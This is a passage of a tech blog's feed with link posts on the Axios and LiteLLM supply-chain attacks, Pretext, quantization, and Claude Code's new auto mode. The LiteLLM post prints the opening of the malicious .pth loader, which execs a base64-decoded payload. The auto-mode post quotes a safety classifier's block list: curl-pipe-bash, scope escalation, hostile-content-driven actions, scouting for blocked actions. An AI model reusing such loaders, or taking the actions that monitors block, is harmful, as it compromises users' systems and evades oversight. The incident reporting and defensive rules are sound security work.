    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vision-llms"&gt;vision-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;&lt;/p&gt;

</summary><category term="google"/><category term="ai"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="llm"/><category term="vision-llms"/><category term="pelican-riding-a-bicycle"/><category term="llm-reasoning"/><category term="gemma"/><category term="llm-release"/><category term="lm-studio"/></entry><entry><title>Supply Chain Attack on Axios Pulls Malicious Dependency from npm</title><link href="https://simonwillison.net/2026/Mar/31/supply-chain-attack-on-axios/#atom-blogmarks" rel="alternate"/><published>2026-03-31T23:28:40+00:00</published><updated>2026-03-31T23:28:40+00:00</updated><id>https://simonwillison.net/2026/Mar/31/supply-chain-attack-on-axios/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://socket.dev/blog/axios-npm-package-compromised"&gt;Supply Chain Attack on Axios Pulls Malicious Dependency from npm&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with &lt;a href="https://www.npmjs.com/package/axios"&gt;101 million weekly downloads&lt;/a&gt;. Versions &lt;code&gt;1.14.1&lt;/code&gt; and &lt;code&gt;0.30.4&lt;/code&gt; both included a new dependency called &lt;code&gt;plain-crypto-js&lt;/code&gt; which was freshly published malware, stealing credentials and installing a remote access trojan (RAT).&lt;/p&gt;
&lt;p&gt;It looks like the attack came from a leaked long-lived npm token. Axios have &lt;a href="https://github.com/axios/axios/issues/7055"&gt;an open issue to adopt trusted publishing&lt;/a&gt;, which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;last week&lt;/a&gt; as well.&lt;/p&gt;
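That heuristic is easy to sketch: compare the versions published to the registry against the tags that have GitHub releases, and flag any version with no matching release. A toy Python version - the version lists here are illustrative stand-ins for real npm registry and GitHub API calls:

```python
def suspicious_versions(npm_versions, github_release_tags):
    """Flag registry versions that have no matching GitHub release.

    GitHub tags are normalized by stripping a leading "v" so that
    "v1.14.0" matches the npm version "1.14.0".
    """
    released = {tag.lstrip("v") for tag in github_release_tags}
    return [v for v in npm_versions if v not in released]

# The two malicious versions were published with no GitHub release:
npm = ["1.14.0", "1.14.1", "0.30.3", "0.30.4"]
gh = ["v1.14.0", "v0.30.3"]
print(suspicious_versions(npm, gh))  # ['1.14.1', '0.30.4']
```

A flagged version isn't proof of compromise, but it's a cheap signal worth alerting on.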

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/l57wuc/supply_chain_attack_on_axios"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;

</summary><category term="javascript"/><category term="security"/><category term="npm"/><category term="supply-chain"/></entry><entry><title>Pretext</title><link href="https://simonwillison.net/2026/Mar/29/pretext/#atom-blogmarks" rel="alternate"/><published>2026-03-29T20:08:45+00:00</published><updated>2026-03-29T20:08:45+00:00</updated><id>https://simonwillison.net/2026/Mar/29/pretext/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/chenglou/pretext"&gt;Pretext&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the &lt;a href="https://github.com/chenglou/react-motion"&gt;react-motion&lt;/a&gt; animation library.&lt;/p&gt;
&lt;p&gt;Pretext solves the problem of calculating the height of a paragraph of line-wrapped text &lt;em&gt;without touching the DOM&lt;/em&gt;. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://chenglou.me/pretext/dynamic-layout/"&gt;one demo&lt;/a&gt; that shows the kind of things this makes possible:&lt;/p&gt;
&lt;video autoplay loop muted playsinline
  poster="https://static.simonwillison.net/static/2026/pretex.jpg"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"&gt;
&lt;/video&gt;

&lt;p&gt;The key to how this works is the way it separates calculations into a call to a &lt;code&gt;prepare()&lt;/code&gt; function followed by multiple calls to &lt;code&gt;layout()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;prepare()&lt;/code&gt; function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-Latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;layout()&lt;/code&gt; function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height.&lt;/p&gt;
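&lt;p&gt;The split can be sketched in a few lines (my own simplified illustration - Pretext's real &lt;code&gt;prepare()&lt;/code&gt; and &lt;code&gt;layout()&lt;/code&gt; handle segmentation, soft hyphens and browser quirks that this greedy loop ignores):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// prepare(): measure every word once via canvas (expensive, cached)
function prepare(ctx, text) {
  return text.split(" ").map(function (word) {
    return { word: word, width: ctx.measureText(word).width };
  });
}

// layout(): greedy word wrap against a width (cheap, no DOM, call freely)
function layout(words, maxWidth, spaceWidth, lineHeight) {
  var lines = 1, lineWidth = 0;
  words.forEach(function (w) {
    var needed = lineWidth === 0 ? w.width : lineWidth + spaceWidth + w.width;
    if (needed &amp;gt; maxWidth &amp;amp;&amp;amp; lineWidth &amp;gt; 0) {
      lines += 1;
      lineWidth = w.width;
    } else {
      lineWidth = needed;
    }
  });
  return lines * lineHeight;
}
&lt;/code&gt;&lt;/pre&gt;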
&lt;p&gt;I &lt;a href="https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe"&gt;had Claude&lt;/a&gt; build me &lt;a href="https://tools.simonwillison.net/pretext-explainer"&gt;this interactive artifact&lt;/a&gt; to help me visually understand what's going on, based on a simplified version of Pretext itself.&lt;/p&gt;
&lt;p&gt;The way this is tested is particularly impressive. The earlier tests &lt;a href="https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2"&gt;rendered a full copy of the Great Gatsby&lt;/a&gt; in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by &lt;a href="https://github.com/chenglou/pretext/tree/main/corpora"&gt;the corpora/ folder&lt;/a&gt; using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more.&lt;/p&gt;
&lt;p&gt;Cheng Lou &lt;a href="https://twitter.com/_chenglou/status/2037715226838343871"&gt;says&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis&lt;/p&gt;
&lt;p&gt;This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure &amp;amp; iterate against those at every significant container width, running over weeks&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/_chenglou/status/2037713766205608234"&gt;@_chenglou&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/browsers"&gt;browsers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/testing"&gt;testing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/react"&gt;react&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/typescript"&gt;typescript&lt;/a&gt;&lt;/p&gt;

</summary><category term="browsers"/><category term="css"/><category term="javascript"/><category term="testing"/><category term="react"/><category term="typescript"/></entry><entry><title>We Rewrote JSONata with AI in a Day, Saved $500K/Year</title><link href="https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-blogmarks" rel="alternate"/><published>2026-03-27T00:35:01+00:00</published><updated>2026-03-27T00:35:01+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.reco.ai/blog/we-rewrote-jsonata-with-ai"&gt;We Rewrote JSONata with AI in a Day, Saved $500K/Year&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Bit of a hyperbolic framing but this looks like another case study of &lt;strong&gt;vibe porting&lt;/strong&gt;, this time spinning up a new custom Go implementation of the &lt;a href="https://jsonata.org"&gt;JSONata&lt;/a&gt; JSON expression language - similar in focus to jq, and heavily associated with the &lt;a href="https://nodered.org"&gt;Node-RED&lt;/a&gt; platform.&lt;/p&gt;
&lt;p&gt;As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.&lt;/p&gt;
&lt;p&gt;The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/go"&gt;go&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-porting"&gt;vibe-porting&lt;/a&gt;&lt;/p&gt;

</summary><category term="go"/><category term="json"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="agentic-engineering"/><category term="vibe-porting"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-blogmarks" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
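&lt;p&gt;The &lt;code&gt;.pth&lt;/code&gt; mechanism is what makes this vector so nasty: any line in a &lt;code&gt;.pth&lt;/code&gt; file that starts with &lt;code&gt;import&lt;/code&gt; is executed by the &lt;code&gt;site&lt;/code&gt; module every time the Python interpreter starts. Since wheels are just zip files, a quick way to check a downloaded wheel for this (my own sketch) is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;python -m zipfile -l litellm-1.82.8-py3-none-any.whl | grep '\.pth'
&lt;/code&gt;&lt;/pre&gt;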
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;

</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>Quantization from the ground up</title><link href="https://simonwillison.net/2026/Mar/26/quantization-from-the-ground-up/#atom-blogmarks" rel="alternate"/><published>2026-03-26T16:21:09+00:00</published><updated>2026-03-26T16:21:09+00:00</updated><id>https://simonwillison.net/2026/Mar/26/quantization-from-the-ground-up/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://ngrok.com/blog/quantization"&gt;Quantization from the ground up&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Sam Rose continues &lt;a href="https://simonwillison.net/tags/sam-rose/"&gt;his streak&lt;/a&gt; of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "&lt;a href="https://twitter.com/samwhoo/status/2036845101561835968"&gt;the best post I've ever made&lt;/a&gt;".)&lt;/p&gt;
&lt;p&gt;Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111101100001110100000, and a slider control at the bottom along with minus, plus, and reset buttons." src="https://static.simonwillison.net/static/2026/float.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;I hadn't heard about &lt;strong&gt;outlier values&lt;/strong&gt; in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are &lt;em&gt;very&lt;/em&gt; important to model quality. Removing even a &lt;em&gt;single&lt;/em&gt; "super weight," as Apple calls them, can cause the model to output complete gibberish.&lt;/p&gt;
&lt;p&gt;Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.&lt;/p&gt;
&lt;/blockquote&gt;
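&lt;p&gt;A minimal sketch of why a single outlier hurts (my own absmax example, not code from the post): the block's scale is set by its largest magnitude, so one huge value crushes everything else into a handful of integer steps.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// absmax quantization: map the largest magnitude in a block to 127
function quantize(block) {
  var scale = Math.max.apply(null, block.map(Math.abs)) / 127;
  return {
    q: block.map(function (x) { return Math.round(x / scale); }),
    scale: scale
  };
}

function dequantize(q, scale) {
  return q.map(function (x) { return x * scale; });
}

var block = [0.01, -0.02, 0.015, 64.0];
// scale is 64 / 127, roughly 0.5, so all three small weights round to 0
var result = quantize(block);
&lt;/code&gt;&lt;/pre&gt;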
&lt;p&gt;Plus there's a section on &lt;a href="https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy"&gt;How much does quantization affect model accuracy?&lt;/a&gt;. Sam explains the concepts of &lt;strong&gt;perplexity&lt;/strong&gt; and &lt;strong&gt;KL divergence&lt;/strong&gt; and then uses the &lt;a href="https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity"&gt;llama.cpp perplexity tool&lt;/a&gt; and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.&lt;/p&gt;
&lt;p&gt;His conclusion:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.&lt;/p&gt;
&lt;/blockquote&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/computer-science"&gt;computer-science&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/explorables"&gt;explorables&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sam-rose"&gt;sam-rose&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/qwen"&gt;qwen&lt;/a&gt;&lt;/p&gt;

</summary><category term="computer-science"/><category term="ai"/><category term="explorables"/><category term="generative-ai"/><category term="llms"/><category term="sam-rose"/><category term="qwen"/></entry><entry><title>Thoughts on slowing the fuck down</title><link href="https://simonwillison.net/2026/Mar/25/thoughts-on-slowing-the-fuck-down/#atom-blogmarks" rel="alternate"/><published>2026-03-25T21:47:17+00:00</published><updated>2026-03-25T21:47:17+00:00</updated><id>https://simonwillison.net/2026/Mar/25/thoughts-on-slowing-the-fuck-down/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://news.ycombinator.com/item?id=47517539"&gt;Thoughts on slowing the fuck down&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Mario Zechner created the &lt;a href="https://github.com/badlogic/pi-mono"&gt;Pi agent framework&lt;/a&gt; used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Agents and humans both make mistakes, but agent mistakes accumulate much faster:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]&lt;/p&gt;
&lt;p&gt;With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...]&lt;/p&gt;
&lt;p&gt;You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I think Mario is exactly right about this. Agents let us move &lt;em&gt;so much faster&lt;/em&gt;, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours.&lt;/p&gt;
&lt;p&gt;It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. &lt;a href="https://simonwillison.net/tags/cognitive-debt/"&gt;Cognitive debt&lt;/a&gt; is real.&lt;/p&gt;
&lt;p&gt;Mario recommends slowing down:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.&lt;/p&gt;
&lt;p&gt;Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed vs. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cognitive-debt"&gt;cognitive-debt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="coding-agents"/><category term="cognitive-debt"/><category term="agentic-engineering"/></entry><entry><title>LiteLLM Hack: Were You One of the 47,000?</title><link href="https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-blogmarks" rel="alternate"/><published>2026-03-25T17:21:04+00:00</published><updated>2026-03-25T17:21:04+00:00</updated><id>https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/"&gt;LiteLLM Hack: Were You One of the 47,000?&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Daniel Hnyk used the &lt;a href="https://console.cloud.google.com/bigquery?p=bigquery-public-data&amp;amp;d=pypi"&gt;BigQuery PyPI dataset&lt;/a&gt; to determine how many downloads there were of &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;the exploited LiteLLM packages&lt;/a&gt; during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).&lt;/p&gt;
&lt;p&gt;They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version.&lt;/p&gt;
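&lt;p&gt;The public dataset makes this kind of forensics a single query. Something like this (my sketch, not Daniel's actual query - &lt;code&gt;file.project&lt;/code&gt; and &lt;code&gt;file.version&lt;/code&gt; are columns in the &lt;code&gt;pypi.file_downloads&lt;/code&gt; table, and the window parameters stand in for the 46 minutes the releases were live):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT file.version, COUNT(*) AS downloads
FROM `bigquery-public-data.pypi.file_downloads`
WHERE file.project = 'litellm'
  AND file.version IN ('1.82.7', '1.82.8')
  AND timestamp BETWEEN @window_start AND @window_end
GROUP BY file.version
&lt;/code&gt;&lt;/pre&gt;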

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/hnykda/status/2036834100342825369"&gt;@hnykda&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;

</summary><category term="packaging"/><category term="pypi"/><category term="python"/><category term="security"/><category term="supply-chain"/></entry><entry><title>Auto mode for Claude Code</title><link href="https://simonwillison.net/2026/Mar/24/auto-mode-for-claude-code/#atom-blogmarks" rel="alternate"/><published>2026-03-24T23:57:33+00:00</published><updated>2026-03-24T23:57:33+00:00</updated><id>https://simonwillison.net/2026/Mar/24/auto-mode-for-claude-code/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://claude.com/blog/auto-mode"&gt;Auto mode for Claude Code&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Really interesting new development in Claude Code today as an alternative to &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Those safeguards appear to be implemented using Claude Sonnet 4.6, as &lt;a href="https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode"&gt;described in the documentation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Model&lt;/strong&gt;: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;claude auto-mode defaults
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://gist.githubusercontent.com/simonw/91863bfd9f7ebf916d1fabb8e6940335/raw/cda3c88e919b8238e85d3f1cc990e8ff48ad9a18/defaults.json"&gt;Here's the full JSON output&lt;/a&gt;. It's pretty long, so here's an illustrative subset:&lt;/p&gt;
&lt;p&gt;From the "allow" list:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases&lt;/li&gt;
&lt;li&gt;Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using &lt;code&gt;--ignore-certificate-errors&lt;/code&gt; for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK.&lt;/li&gt;
&lt;li&gt;Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it.&lt;/li&gt;
&lt;li&gt;Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (&lt;code&gt;pip install -r requirements.txt&lt;/code&gt;, &lt;code&gt;npm install&lt;/code&gt;, &lt;code&gt;cargo build&lt;/code&gt;, &lt;code&gt;bundle install&lt;/code&gt;) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. &lt;code&gt;pip install foo&lt;/code&gt;, &lt;code&gt;npm install bar&lt;/code&gt;) — those carry typosquat and supply-chain risk. [...]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;From "soft_deny":&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Git Destructive: Force pushing (&lt;code&gt;git push --force&lt;/code&gt;), deleting remote branches, or rewriting remote history&lt;/li&gt;
&lt;li&gt;Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead.&lt;/li&gt;
&lt;li&gt;Code from External: Downloading and executing code from external sources — e.g. &lt;code&gt;curl | bash&lt;/code&gt;, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted.&lt;/li&gt;
